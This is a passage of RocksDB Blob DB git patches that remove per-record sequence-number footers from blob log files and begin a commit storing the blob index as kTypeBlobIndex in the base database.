virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) override { if (column_family_id != default_cf_id_) { - batch_rewrite_status_ = Status::NotSupported( + return Status::NotSupported( "Blob DB doesn't support non-default column family."); - return batch_rewrite_status_; } WriteBatchInternal::Delete(&updates_blob_, column_family_id, key); sequence_++; @@ -864,27 +845,23 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status DeleteRange(uint32_t column_family_id, const Slice& begin_key, const Slice& end_key) { if (column_family_id != default_cf_id_) { - batch_rewrite_status_ = Status::NotSupported( + return Status::NotSupported( "Blob DB doesn't support non-default column family."); - return batch_rewrite_status_; } WriteBatchInternal::DeleteRange(&updates_blob_, column_family_id, begin_key, end_key); + sequence_++; return Status::OK(); } virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, const Slice& /*key*/) override { - batch_rewrite_status_ = - Status::NotSupported("Not supported operation in blob db."); - return batch_rewrite_status_; + return Status::NotSupported("Not supported operation in blob db."); } virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, const Slice& /*value*/) override { - batch_rewrite_status_ = - Status::NotSupported("Not supported operation in blob db."); - return batch_rewrite_status_; + return Status::NotSupported("Not supported operation in blob db."); } virtual void LogData(const Slice& blob) override { @@ -894,19 +871,20 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { MutexLock l(&write_mutex_); - SequenceNumber sequence = db_impl_->GetLatestSequenceNumber() + 1; - BlobInserter blob_inserter(this, sequence); - updates->Iterate(&blob_inserter); - - if (!blob_inserter.batch_rewrite_status().ok()) { - return blob_inserter.batch_rewrite_status(); + SequenceNumber current_seq = db_impl_->GetLatestSequenceNumber() + 1; + BlobInserter blob_inserter(this, current_seq); + Status s = updates->Iterate(&blob_inserter); + if (!s.ok()) { + return s; } - - Status s = db_->Write(opts, &(blob_inserter.updates_blob())); + s = db_->Write(opts, blob_inserter.updates_blob()); if (!s.ok()) { return s; } - + assert(current_seq == + WriteBatchInternal::Sequence(blob_inserter.updates_blob())); + assert(blob_inserter.sequence() == + current_seq + WriteBatchInternal::Count(blob_inserter.updates_blob())); if (blob_inserter.has_put()) { s = CloseBlobFileIfNeeded(blob_inserter.last_file()); if (!s.ok()) { @@ -942,7 +920,7 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { }; // add deleted key to list of keys that have been deleted for book-keeping - DeleteBookkeeper delete_bookkeeper(this, sequence); + DeleteBookkeeper delete_bookkeeper(this, current_seq); updates->Iterate(&delete_bookkeeper); return Status::OK(); @@ -1051,20 +1029,7 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, // this is the sequence number of the write. SequenceNumber sn = WriteBatchInternal::Sequence(&batch); - - if (debug_level_ >= 3) - ROCKS_LOG_INFO(db_options_.info_log, "PathName().c_str(), key.ToString().c_str(), sn); - - s = AppendSN(bfile, sn); - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "Failed to append SN to FILE: %s: KEY: %s VALSZ: %d" - " status: '%s' blob_file: '%s'", - bfile->PathName().c_str(), key.ToString().c_str(), - value.size(), s.ToString().c_str(), - bfile->DumpState().c_str()); - } + bfile->ExtendSequenceRange(sn); if (expiration != kNoExpiration) { extendTTL(&(bfile->ttl_range_), expiration); @@ -1140,32 +1105,6 @@ Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, return s; } -Status BlobDBImpl::AppendSN(const std::shared_ptr& bfile, - const SequenceNumber& sn) { - Status s; - { - WriteLock lockbfile_w(&bfile->mutex_); - std::shared_ptr writer = CheckOrCreateWriterLocked(bfile); - if (!writer) return Status::IOError("Failed to create blob writer"); - - s = writer->AddRecordFooter(sn); - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "Invalid status in AppendSN: %s status: '%s'", - bfile->PathName().c_str(), s.ToString().c_str()); - return s; - } - - if (sn != std::numeric_limits::max()) - extendSN(&(bfile->sn_range_), sn); - } - - bfile->file_size_ += BlobLogRecord::kFooterSize; - last_period_write_ += BlobLogRecord::kFooterSize; - total_blob_space_ += BlobLogRecord::kFooterSize; - return s; -} - std::vector BlobDBImpl::MultiGet( const ReadOptions& read_options, const std::vector& keys, std::vector* values) { @@ -1205,7 +1144,8 @@ bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { } Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, - std::string* value, SequenceNumber* sequence) { + std::string* value) { + assert(value != nullptr); Slice index_entry_slice(index_entry); BlobHandle handle; Status s = handle.DecodeFrom(&index_entry_slice); @@ -1249,90 +1189,69 @@ Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, std::shared_ptr reader = GetOrOpenRandomAccessReader(bfile, env_, env_options_); - if (value != nullptr) { - std::string* valueptr = value; - std::string value_c; - if (bdb_options_.compression != kNoCompression) { - valueptr = &value_c; - } + std::string* valueptr = value; + std::string value_c; + if (bdb_options_.compression != kNoCompression) { + valueptr = &value_c; + } - // allocate the buffer. This is safe in C++11 - valueptr->resize(handle.size()); - char* buffer = &(*valueptr)[0]; - - Slice blob_value; - s = reader->Read(handle.offset(), handle.size(), &blob_value, buffer); - if (!s.ok() || blob_value.size() != handle.size()) { - if (debug_level_ >= 2) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "Failed to read blob from file: %s blob_offset: %" PRIu64 - " blob_size: %" PRIu64 " read: %d key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - static_cast(blob_value.size()), key.data(), - s.ToString().c_str()); - } - return Status::NotFound("Blob Not Found as couldnt retrieve Blob"); - } + // allocate the buffer. This is safe in C++11 + valueptr->resize(handle.size()); + char* buffer = &(*valueptr)[0]; - Slice crc_slice; - uint32_t crc_exp; - std::string crc_str; - crc_str.resize(sizeof(uint32_t)); - char* crc_buffer = &(crc_str[0]); - s = reader->Read(handle.offset() - (key.size() + sizeof(uint32_t)), - sizeof(uint32_t), &crc_slice, crc_buffer); - if (!s.ok() || !GetFixed32(&crc_slice, &crc_exp)) { - if (debug_level_ >= 2) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "Failed to fetch blob crc file: %s blob_offset: %" PRIu64 - " blob_size: %" PRIu64 " key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - key.data(), s.ToString().c_str()); - } - return Status::NotFound("Blob Not Found as couldnt retrieve CRC"); + Slice blob_value; + s = reader->Read(handle.offset(), handle.size(), &blob_value, buffer); + if (!s.ok() || blob_value.size() != handle.size()) { + if (debug_level_ >= 2) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Failed to read blob from file: %s blob_offset: %" PRIu64 + " blob_size: %" PRIu64 " read: %d key: %s status: '%s'", + bfile->PathName().c_str(), handle.offset(), handle.size(), + static_cast(blob_value.size()), key.data(), + s.ToString().c_str()); } + return Status::NotFound("Blob Not Found as couldnt retrieve Blob"); + } - uint32_t crc = crc32c::Extend(0, blob_value.data(), blob_value.size()); - crc = crc32c::Mask(crc); // Adjust for storage - if (crc != crc_exp) { - if (debug_level_ >= 2) { - ROCKS_LOG_ERROR(db_options_.info_log, - "Blob crc mismatch file: %s blob_offset: %" PRIu64 - " blob_size: %" PRIu64 " key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), - handle.size(), key.data(), s.ToString().c_str()); - } - return Status::Corruption("Corruption. Blob CRC mismatch"); + Slice crc_slice; + uint32_t crc_exp; + std::string crc_str; + crc_str.resize(sizeof(uint32_t)); + char* crc_buffer = &(crc_str[0]); + s = reader->Read(handle.offset() - (key.size() + sizeof(uint32_t)), + sizeof(uint32_t), &crc_slice, crc_buffer); + if (!s.ok() || !GetFixed32(&crc_slice, &crc_exp)) { + if (debug_level_ >= 2) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Failed to fetch blob crc file: %s blob_offset: %" PRIu64 + " blob_size: %" PRIu64 " key: %s status: '%s'", + bfile->PathName().c_str(), handle.offset(), handle.size(), + key.data(), s.ToString().c_str()); } + return Status::NotFound("Blob Not Found as couldnt retrieve CRC"); + } - if (bdb_options_.compression != kNoCompression) { - BlockContents contents; - auto cfh = - reinterpret_cast(DefaultColumnFamily()); - s = UncompressBlockContentsForCompressionType( - blob_value.data(), blob_value.size(), &contents, - kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, - *(cfh->cfd()->ioptions())); - *value = contents.data.ToString(); + uint32_t crc = crc32c::Extend(0, blob_value.data(), blob_value.size()); + crc = crc32c::Mask(crc); // Adjust for storage + if (crc != crc_exp) { + if (debug_level_ >= 2) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Blob crc mismatch file: %s blob_offset: %" PRIu64 + " blob_size: %" PRIu64 " key: %s status: '%s'", + bfile->PathName().c_str(), handle.offset(), handle.size(), + key.data(), s.ToString().c_str()); } + return Status::Corruption("Corruption. Blob CRC mismatch"); } - if (sequence != nullptr) { - char buffer[BlobLogRecord::kFooterSize]; - Slice footer_slice; - s = reader->Read(handle.offset() + handle.size(), - BlobLogRecord::kFooterSize, &footer_slice, buffer); - if (!s.ok()) { - return s; - } - BlobLogRecord record; - s = record.DecodeFooterFrom(footer_slice); - if (!s.ok()) { - return s; - } - *sequence = record.GetSN(); + if (bdb_options_.compression != kNoCompression) { + BlockContents contents; + auto cfh = reinterpret_cast(DefaultColumnFamily()); + s = UncompressBlockContentsForCompressionType( + blob_value.data(), blob_value.size(), &contents, + kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, + *(cfh->cfd()->ioptions())); + *value = contents.data.ToString(); } return s; @@ -1488,8 +1407,7 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, WriteLock lockbfile_w(&bfile->mutex_); bfile->deleted_count_++; - bfile->deleted_size_ += key_size + blob_size + BlobLogRecord::kHeaderSize + - BlobLogRecord::kFooterSize; + bfile->deleted_size_ += key_size + blob_size + BlobLogRecord::kHeaderSize; return true; } @@ -1742,7 +1660,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool has_ttl = header.HasTTL(); // this reads the key but skips the blob - Reader::ReadLevel shallow = Reader::kReadHdrKeyFooter; + Reader::ReadLevel shallow = Reader::kReadHeaderKey; assert(opt_db_); @@ -1759,7 +1677,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool no_relocation = no_relocation_ttl || no_relocation_lsmdel; if (!no_relocation) { // read the blob because you have to write it back to new file - shallow = Reader::kReadHdrKeyBlobFooter; + shallow = Reader::kReadHeaderKeyBlob; } BlobLogRecord record; @@ -1906,10 +1824,9 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, new_handle.set_compression(bdb_options_.compression); new_handle.EncodeTo(&new_index_entry); - new_writer->AddRecordFooter(record.GetSN()); newfile->blob_count_++; - newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + - record.Blob().size() + BlobLogRecord::kFooterSize; + newfile->file_size_ += + BlobLogRecord::kHeaderSize + record.Key().size() + record.Blob().size(); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"); transaction->Put(cfh, record.Key(), new_index_entry); @@ -2105,7 +2022,7 @@ bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { ColumnFamilyHandle* cfh = bfile->GetColumnFamily(db_); BlobLogRecord record; - Reader::ReadLevel full = Reader::kReadHdrKeyBlobFooter; + Reader::ReadLevel full = Reader::kReadHeaderKeyBlob; while (reader->ReadRecord(&record, full).ok()) { bdb_options_.gc_evict_cb_fn(cfh, record.Key(), record.Blob()); } @@ -2320,16 +2237,6 @@ Status DestroyBlobDB(const std::string& dbname, const Options& options, } #ifndef NDEBUG -Status BlobDBImpl::TEST_GetSequenceNumber(const Slice& key, - SequenceNumber* sequence) { - std::string index_entry; - Status s = db_->Get(ReadOptions(), key, &index_entry); - if (!s.ok()) { - return s; - } - return CommonGet(key, index_entry, nullptr, sequence); -} - std::vector> BlobDBImpl::TEST_GetBlobFiles() const { ReadLock l(&mutex_); std::vector> blob_files; diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 6cb0d30a220..5654d05e569 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -252,8 +252,6 @@ class BlobDBImpl : public BlobDB { ~BlobDBImpl(); #ifndef NDEBUG - Status TEST_GetSequenceNumber(const Slice& key, SequenceNumber* sequence); - std::vector> TEST_GetBlobFiles() const; std::vector> TEST_GetObsoleteFiles() const; @@ -278,7 +276,7 @@ class BlobDBImpl : public BlobDB { bool SetSnapshotIfNeeded(ReadOptions* read_options); Status CommonGet(const Slice& key, const std::string& index_entry, - std::string* value, SequenceNumber* sequence = nullptr); + std::string* value); Slice GetCompressedSlice(const Slice& raw, std::string* compression_output) const; @@ -310,9 +308,6 @@ class BlobDBImpl : public BlobDB { const std::string& headerbuf, const Slice& key, const Slice& value, std::string* index_entry); - Status AppendSN(const std::shared_ptr& bfile, - const SequenceNumber& sn); - // find an existing blob log file based on the expiration unix epoch // if such a file does not exist, return nullptr std::shared_ptr SelectBlobFileTTL(uint64_t expiration); diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 9d0214effb7..5c15041e2da 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -530,43 +530,6 @@ TEST_F(BlobDBTest, MultipleWriters) { VerifyDB(data); } -// Test sequence number store in blob file is correct. -TEST_F(BlobDBTest, SequenceNumber) { - Random rnd(301); - BlobDBOptions bdb_options; - bdb_options.disable_background_tasks = true; - Open(bdb_options); - SequenceNumber sequence = blob_db_->GetLatestSequenceNumber(); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - for (int i = 0; i < 100; i++) { - std::string key = "key" + ToString(i); - PutRandom(key, &rnd); - sequence += 1; - ASSERT_EQ(sequence, blob_db_->GetLatestSequenceNumber()); - SequenceNumber actual_sequence = 0; - ASSERT_OK(blob_db_impl->TEST_GetSequenceNumber(key, &actual_sequence)); - ASSERT_EQ(sequence, actual_sequence); - } - for (int i = 0; i < 100; i++) { - WriteBatch batch; - size_t batch_size = rnd.Next() % 10 + 1; - for (size_t k = 0; k < batch_size; k++) { - std::string value = test::RandomHumanReadableString(&rnd, 1000); - ASSERT_OK(batch.Put("key" + ToString(i) + "-" + ToString(k), value)); - } - ASSERT_OK(blob_db_->Write(WriteOptions(), &batch)); - for (size_t k = 0; k < batch_size; k++) { - std::string key = "key" + ToString(i) + "-" + ToString(k); - sequence++; - SequenceNumber actual_sequence; - ASSERT_OK(blob_db_impl->TEST_GetSequenceNumber(key, &actual_sequence)); - ASSERT_EQ(sequence, actual_sequence); - } - ASSERT_EQ(sequence, blob_db_->GetLatestSequenceNumber()); - } -} - TEST_F(BlobDBTest, GCAfterOverwriteKeys) { Random rnd(301); BlobDBOptions bdb_options; diff --git a/utilities/blob_db/blob_dump_tool.cc b/utilities/blob_db/blob_dump_tool.cc index c9db7e8fa67..e9b7351bb23 100644 --- a/utilities/blob_db/blob_dump_tool.cc +++ b/utilities/blob_db/blob_dump_tool.cc @@ -185,7 +185,7 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, uint32_t header_crc = crc32c::Extend(0, slice.data(), slice.size() - 2 * sizeof(uint32_t)); *offset += BlobLogRecord::kHeaderSize; - s = Read(*offset, key_size + blob_size + BlobLogRecord::kFooterSize, &slice); + s = Read(*offset, key_size + blob_size, &slice); if (!s.ok()) { return s; } @@ -207,15 +207,7 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, DumpSlice(Slice(slice.data() + key_size, blob_size), show_blob); } } - Slice footer_slice(slice.data() + record.GetKeySize() + record.GetBlobSize(), - BlobLogRecord::kFooterSize); - s = record.DecodeFooterFrom(footer_slice); - if (!s.ok()) { - return s; - } - fprintf(stdout, " footer CRC : %" PRIu32 "\n", record.footer_checksum()); - fprintf(stdout, " sequence : %" PRIu64 "\n", record.GetSN()); - *offset += key_size + blob_size + BlobLogRecord::kFooterSize; + *offset += key_size + blob_size; return s; } diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index dd98ed9d120..b247a69f33d 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -5,8 +5,14 @@ #ifndef ROCKSDB_LITE #include "utilities/blob_db/blob_file.h" +#ifndef __STDC_FORMAT_MACROS +#define __STDC_FORMAT_MACROS +#endif + +#include #include -#include + +#include #include #include "util/filename.h" diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index d648ddee412..a18bf778abe 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -147,6 +147,11 @@ class BlobFile { return header_.HasTimestamp(); } + void ExtendSequenceRange(SequenceNumber sequence) { + sn_range_.first = std::min(sn_range_.first, sequence); + sn_range_.second = std::max(sn_range_.second, sequence); + } + std::shared_ptr GetWriter() const { return log_writer_; } void Fsync(); diff --git a/utilities/blob_db/blob_log_format.cc b/utilities/blob_db/blob_log_format.cc index b5c8fe56e8b..2e6fa3c63c9 100644 --- a/utilities/blob_db/blob_log_format.cc +++ b/utilities/blob_db/blob_log_format.cc @@ -224,7 +224,6 @@ BlobLogRecord::BlobLogRecord() blob_size_(0), time_val_(0), ttl_val_(0), - sn_(0), type_(0), subtype_(0) {} @@ -249,7 +248,6 @@ void BlobLogRecord::Clear() { blob_size_ = 0; time_val_ = 0; ttl_val_ = 0; - sn_ = 0; type_ = subtype_ = 0; key_.clear(); blob_.clear(); @@ -289,30 +287,6 @@ Status BlobLogRecord::DecodeHeaderFrom(const Slice& hdrslice) { return Status::OK(); } -Status BlobLogRecord::DecodeFooterFrom(const Slice& footerslice) { - Slice input = footerslice; - if (input.size() < kFooterSize) { - return Status::Corruption("Invalid Blob Record Footer: size"); - } - - uint32_t f_crc = crc32c::Extend(0, input.data(), 8); - f_crc = crc32c::Mask(f_crc); - - if (!GetFixed64(&input, &sn_)) { - return Status::Corruption("Invalid Blob Record Footer: sn"); - } - - if (!GetFixed32(&input, &footer_cksum_)) { - return Status::Corruption("Invalid Blob Record Footer: cksum"); - } - - if (f_crc != footer_cksum_) { - return Status::Corruption("Record Checksum mismatch: footer_cksum"); - } - - return Status::OK(); -} - } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index 5a22390b271..c5b96d1b07a 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -188,8 +188,6 @@ class BlobLogRecord { uint64_t blob_size_; uint64_t time_val_; uint64_t ttl_val_; - SequenceNumber sn_; - uint32_t footer_cksum_; char type_; char subtype_; Slice key_; @@ -218,8 +216,6 @@ class BlobLogRecord { // = 42 static const size_t kHeaderSize = 4 + 4 + 8 + 8 + 4 + 8 + 1 + 1; - static const size_t kFooterSize = 8 + 4; - public: BlobLogRecord(); @@ -245,17 +241,11 @@ class BlobLogRecord { char subtype() const { return subtype_; } - SequenceNumber GetSN() const { return sn_; } - uint32_t header_checksum() const { return header_cksum_; } uint32_t checksum() const { return checksum_; } - uint32_t footer_checksum() const { return footer_cksum_; } - Status DecodeHeaderFrom(const Slice& hdrslice); - - Status DecodeFooterFrom(const Slice& footerslice); }; } // namespace blob_db diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 75afab2e743..826551d686e 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -69,21 +69,11 @@ Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, *blob_offset = next_byte_ + record->GetKeySize(); } switch (level) { - case kReadHdrFooter: + case kReadHeader: file_->Skip(kb_size); next_byte_ += kb_size; - status = - file_->Read(BlobLogRecord::kFooterSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; - if (buffer_.size() != BlobLogRecord::kFooterSize) { - return Status::IOError("EOF reached before record footer"); - } - - status = record->DecodeFooterFrom(buffer_); - return status; - case kReadHdrKeyFooter: + case kReadHeaderKey: record->ResizeKeyBuffer(record->GetKeySize()); status = file_->Read(record->GetKeySize(), &record->key_, record->GetKeyBuffer()); @@ -103,18 +93,7 @@ Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, file_->Skip(record->GetBlobSize()); next_byte_ += record->GetBlobSize(); - status = - file_->Read(BlobLogRecord::kFooterSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; - if (buffer_.size() != BlobLogRecord::kFooterSize) { - return Status::IOError("EOF reached during footer read"); - } - - status = record->DecodeFooterFrom(buffer_); - return status; - - case kReadHdrKeyBlobFooter: + case kReadHeaderKeyBlob: record->ResizeKeyBuffer(record->GetKeySize()); status = file_->Read(record->GetKeySize(), &record->key_, record->GetKeyBuffer()); @@ -146,21 +125,8 @@ Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, if (blob_crc != record->checksum_) { return Status::Corruption("Blob Checksum mismatch"); } - - status = - file_->Read(BlobLogRecord::kFooterSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; - if (buffer_.size() != BlobLogRecord::kFooterSize) { - return Status::IOError("EOF reached during blob footer read"); - } - - status = record->DecodeFooterFrom(buffer_); - return status; - default: - assert(0); - return status; } + return status; } } // namespace blob_db diff --git a/utilities/blob_db/blob_log_reader.h b/utilities/blob_db/blob_log_reader.h index 5522ec3a28b..d37e10bc4e4 100644 --- a/utilities/blob_db/blob_log_reader.h +++ b/utilities/blob_db/blob_log_reader.h @@ -32,9 +32,9 @@ namespace blob_db { class Reader { public: enum ReadLevel { - kReadHdrFooter, - kReadHdrKeyFooter, - kReadHdrKeyBlobFooter, + kReadHeader, + kReadHeaderKey, + kReadHeaderKeyBlob, }; // Create a reader that will return log records from "*file". @@ -61,7 +61,7 @@ class Reader { // will only be valid until the next mutating operation on this // reader or the next mutation to *scratch. // If blob_offset is non-null, return offset of the blob through it. - Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHdrFooter, + Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHeader, uint64_t* blob_offset = nullptr); SequentialFileReader* file() { return file_.get(); } diff --git a/utilities/blob_db/blob_log_writer.cc b/utilities/blob_db/blob_log_writer.cc index 0a049b75c69..f4fcaeb90f9 100644 --- a/utilities/blob_db/blob_log_writer.cc +++ b/utilities/blob_db/blob_log_writer.cc @@ -2,7 +2,6 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// #ifndef ROCKSDB_LITE #include "utilities/blob_db/blob_log_writer.h" @@ -53,7 +52,7 @@ Status Writer::WriteHeader(const BlobLogHeader& header) { Status Writer::AppendFooter(const BlobLogFooter& footer) { assert(block_offset_ != 0); - assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtFooter); + assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string str; footer.EncodeTo(&str); @@ -73,7 +72,7 @@ Status Writer::AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset, uint64_t ttl) { assert(block_offset_ != 0); - assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtFooter); + assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string buf; ConstructBlobHeader(&buf, key, val, ttl, -1); @@ -85,7 +84,7 @@ Status Writer::AddRecord(const Slice& key, const Slice& val, Status Writer::AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset) { assert(block_offset_ != 0); - assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtFooter); + assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string buf; ConstructBlobHeader(&buf, key, val, -1, -1); @@ -134,7 +133,12 @@ Status Writer::EmitPhysicalRecord(const std::string& headerbuf, Status s = dest_->Append(Slice(headerbuf)); if (s.ok()) { s = dest_->Append(key); - if (s.ok()) s = dest_->Append(val); + } + if (s.ok()) { + s = dest_->Append(val); + } + if (s.ok()) { + s = dest_->Flush(); } *key_offset = block_offset_ + BlobLogRecord::kHeaderSize; @@ -144,25 +148,6 @@ Status Writer::EmitPhysicalRecord(const std::string& headerbuf, return s; } -Status Writer::AddRecordFooter(const SequenceNumber& seq) { - assert(last_elem_type_ == kEtRecord); - - std::string buf; - PutFixed64(&buf, seq); - - uint32_t footer_crc = crc32c::Extend(0, buf.c_str(), buf.size()); - footer_crc = crc32c::Mask(footer_crc); - PutFixed32(&buf, footer_crc); - - Status s = dest_->Append(Slice(buf)); - block_offset_ += BlobLogRecord::kFooterSize; - - if (s.ok()) dest_->Flush(); - - last_elem_type_ = kEtFooter; - return s; -} - } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_log_writer.h b/utilities/blob_db/blob_log_writer.h index a3c176ecbfe..d674351588b 100644 --- a/utilities/blob_db/blob_log_writer.h +++ b/utilities/blob_db/blob_log_writer.h @@ -2,7 +2,6 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// #pragma once #ifndef ROCKSDB_LITE @@ -53,8 +52,6 @@ class Writer { const Slice& val, uint64_t* key_offset, uint64_t* blob_offset); - Status AddRecordFooter(const SequenceNumber& sn); - Status AppendFooter(const BlobLogFooter& footer); Status WriteHeader(const BlobLogHeader& header); @@ -89,7 +86,7 @@ class Writer { Writer& operator=(const Writer&) = delete; public: - enum ElemType { kEtNone, kEtFileHdr, kEtRecord, kEtFooter, kEtFileFooter }; + enum ElemType { kEtNone, kEtFileHdr, kEtRecord, kEtFileFooter }; ElemType last_elem_type_; }; From 2b8893b9e4224a9a3edb00e2dea2451199e50048 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 17 Oct 2017 17:24:25 -0700 Subject: [PATCH 176/205] Blob DB: Store blob index as kTypeBlobIndex in base db Summary: Blob db insert blob index to base db as kTypeBlobIndex type, to tell apart values written by plain rocksdb or blob db. This is to make it possible to migrate from existing rocksdb to blob db. Also with the patch blob db garbage collection get away from OptimisticTransaction. Instead it use a custom write callback to achieve similar behavior as OptimisticTransaction. This is because we need to pass the is_blob_index flag to DBImpl::Get but OptimisticTransaction don't support it. Closes https://github.com/facebook/rocksdb/pull/3000 Differential Revision: D6050044 Pulled By: yiwu-arbug fbshipit-source-id: 61dc72ab9977625e75f78cd968e7d8a3976e3632 --- db/db_impl.cc | 11 +- db/db_impl.h | 16 +- db/memtable_list.cc | 12 +- db/memtable_list.h | 8 +- utilities/blob_db/blob_db_impl.cc | 306 +++++++++++++++------------ utilities/blob_db/blob_db_impl.h | 71 ++----- utilities/blob_db/blob_db_iterator.h | 104 +++++++++ utilities/blob_db/blob_db_test.cc | 89 ++++++-- 8 files changed, 376 insertions(+), 241 deletions(-) create mode 100644 utilities/blob_db/blob_db_iterator.h diff --git a/db/db_impl.cc b/db/db_impl.cc index 688bc51fad8..8e9754320a7 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -2528,7 +2528,8 @@ SequenceNumber DBImpl::GetEarliestMemTableSequenceNumber(SuperVersion* sv, #ifndef ROCKSDB_LITE Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, bool cache_only, SequenceNumber* seq, - bool* found_record_for_key) { + bool* found_record_for_key, + bool* is_blob_index) { Status s; MergeContext merge_context; RangeDelAggregator range_del_agg(sv->mem->GetInternalKeyComparator(), @@ -2543,7 +2544,7 @@ Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, // Check if there is a record for this key in the latest memtable sv->mem->Get(lkey, nullptr, &s, &merge_context, &range_del_agg, seq, - read_options); + read_options, is_blob_index); if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) { // unexpected error reading memtable. @@ -2562,7 +2563,7 @@ Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, // Check if there is a record for this key in the immutable memtables sv->imm->Get(lkey, nullptr, &s, &merge_context, &range_del_agg, seq, - read_options); + read_options, is_blob_index); if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) { // unexpected error reading memtable. @@ -2581,7 +2582,7 @@ Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, // Check if there is a record for this key in the immutable memtables sv->imm->GetFromHistory(lkey, nullptr, &s, &merge_context, &range_del_agg, - seq, read_options); + seq, read_options, is_blob_index); if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) { // unexpected error reading memtable. @@ -2605,7 +2606,7 @@ Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, // Check tables sv->current->Get(read_options, lkey, nullptr, &s, &merge_context, &range_del_agg, nullptr /* value_found */, - found_record_for_key, seq); + found_record_for_key, seq, is_blob_index); if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) { // unexpected error reading SST files diff --git a/db/db_impl.h b/db/db_impl.h index 76b52b8b83f..230f614b4f4 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -94,6 +94,13 @@ class DBImpl : public DB { virtual Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; + + // Function that Get and KeyMayExist call with no_io true or false + // Note: 'value_found' from KeyMayExist propagates here + Status GetImpl(const ReadOptions& options, 